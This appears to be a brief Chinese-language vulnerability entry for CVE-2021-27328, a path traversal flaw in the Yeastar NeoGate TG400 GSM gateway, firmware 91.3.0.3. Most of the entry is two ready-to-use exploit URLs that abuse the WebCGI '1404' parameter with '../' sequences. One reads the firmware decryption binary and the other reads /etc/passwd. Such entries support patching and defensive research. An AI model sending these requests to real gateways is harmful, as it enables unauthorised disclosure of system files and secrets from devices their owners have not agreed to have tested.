朗视 Yeastar NeoGate TG400 路径遍历漏洞CVE-2021-27328
描述
朗视 TG400 GSM 网关存在路径遍历 ,攻击者可以通过漏洞获取敏感信息
影响范围
朗视 TG400 GSM 网关91.3.0.3
获取固件解密密码
/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
/etc/passwd:
/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd